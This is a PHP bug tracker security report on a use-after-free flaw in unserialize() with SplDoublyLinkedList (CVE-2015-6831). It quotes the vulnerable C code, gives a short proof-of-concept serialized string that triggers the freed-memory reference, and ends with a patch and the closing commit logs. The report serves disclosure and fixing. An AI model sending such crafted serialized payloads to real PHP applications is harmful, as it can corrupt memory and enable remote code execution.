php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login
Sec Bug #70169 Use After Free Vulnerability in unserialize() with SplDoublyLinkedList
Submitted: 2015-07-30 11:11 UTC Modified: 2015-09-09 10:05 UTC
From: taoguangchen at icloud dot com Assigned: stas
Status: Closed Package: *General Issues
PHP Version: 5.4.43 OS: *
Private report: No CVE-ID: 2015-6831
 [2015-07-30 11:11 UTC] taoguangchen at icloud dot com
Description:
------------
I has reported a similar bug in BUG#70168

```
	ALLOC_INIT_ZVAL(flags);
	if (!php_var_unserialize(&flags, &p, s + buf_len, &var_hash TSRMLS_CC) || Z_TYPE_P(flags) != IS_LONG) {
		zval_ptr_dtor(&flags);
		goto error;
	}
	intern->flags = Z_LVAL_P(flags);
	zval_ptr_dtor(&flags);   <=== free memory
	
	...

	PHP_VAR_UNSERIALIZE_DESTROY(var_hash);
	return;
```

&flags was be freed, but we can use that already freed memory via R: and r:. it is possible to use-after-free attack and execute arbitrary code remotely.

PoC:

```
$inner = 'i:1;';
$exploit = 'a:2:{i:0;C:19:"SplDoublyLinkedList":'.strlen($inner).':{'.$inner.'}i:1;R:3;}';

$data = unserialize($exploit);

for($i = 0; $i < 5; $i++) {
    $v[$i] = 'hi'.$i;
}

var_dump($data);
```


Patches

Add a Patch

Pull Requests

Add a Pull Request

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2015-07-30 11:15 UTC] taoguangchen at icloud dot com
the patch for 5.4 series ( maybe work on 5.5 and 5.6 series ):

diff --git a/php-5.4.43/spl_dllist.c b/php-5.4.43-fixed/spl_dllist.c
index b5ddfc0..790fb60 100644
--- a/php-5.4.43/spl_dllist.c
+++ b/php-5.4.43-fixed/spl_dllist.c
@@ -1209,6 +1209,9 @@ SPL_METHOD(SplDoublyLinkedList, unserialize)
 		zval_ptr_dtor(&flags);
 		goto error;
 	}
+	
+	var_push_dtor(&var_hash, &flags);
+	
 	intern->flags = Z_LVAL_P(flags);
 	zval_ptr_dtor(&flags);
 [2015-08-04 22:22 UTC] stas@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=863bf294feb9ad425eadb94f288bc7f18673089d
Log: Fixed bug #70169 (Use After Free Vulnerability in unserialize() with SplDoublyLinkedList)
 [2015-08-04 22:22 UTC] stas@php.net
-Status: Open +Status: Closed
 [2015-08-04 22:23 UTC] stas@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=863bf294feb9ad425eadb94f288bc7f18673089d
Log: Fixed bug #70169 (Use After Free Vulnerability in unserialize() with SplDoublyLinkedList)
 [2015-08-04 22:30 UTC] stas@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=863bf294feb9ad425eadb94f288bc7f18673089d
Log: Fixed bug #70169 (Use After Free Vulnerability in unserialize() with SplDoublyLinkedList)
 [2015-08-05 07:29 UTC] stas@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=863bf294feb9ad425eadb94f288bc7f18673089d
Log: Fixed bug #70169 (Use After Free Vulnerability in unserialize() with SplDoublyLinkedList)
 [2015-08-05 10:12 UTC] ab@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=863bf294feb9ad425eadb94f288bc7f18673089d
Log: Fixed bug #70169 (Use After Free Vulnerability in unserialize() with SplDoublyLinkedList)
 [2015-09-09 10:05 UTC] kaplan@php.net
-Assigned To: +Assigned To: stas -CVE-ID: +CVE-ID: 2015-6831
 [2015-09-09 10:05 UTC] kaplan@php.net
Shared CVE between bugs #70155, #70166, #70168 and #70169.
 
PHP Copyright © 2001-2017 The PHP Group
All rights reserved.
Last updated: Tue Aug 29 15:01:52 2017 UTC